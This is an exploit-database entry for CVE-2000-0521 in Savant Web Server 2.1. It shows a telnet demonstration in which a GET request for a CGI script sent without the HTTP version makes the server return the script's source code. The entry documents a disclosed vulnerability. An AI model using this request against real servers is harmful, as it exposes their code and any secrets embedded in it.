Michael Lamont Savant Web Server 2.1 - CGI Source Code Disclosure
| EKU-ID: 25572 | CVE: CVE-2000-0521;OSVDB-517 | OSVDB-ID: |
| Author: Drew | Published: 2000-06-05 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 25572 | CVE: CVE-2000-0521;OSVDB-517 | OSVDB-ID: |
| Author: Drew | Published: 2000-06-05 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/1313/info Omitting the HTTP version from a "GET" request for a CGI script to the Savant Web Server discloses the source code of the script. telnet target 80 GET /cgi-bin/script.xyz HTTP/1.0 <proper script execution/output> GET /cgi-bin/script.xyz <source code displayed>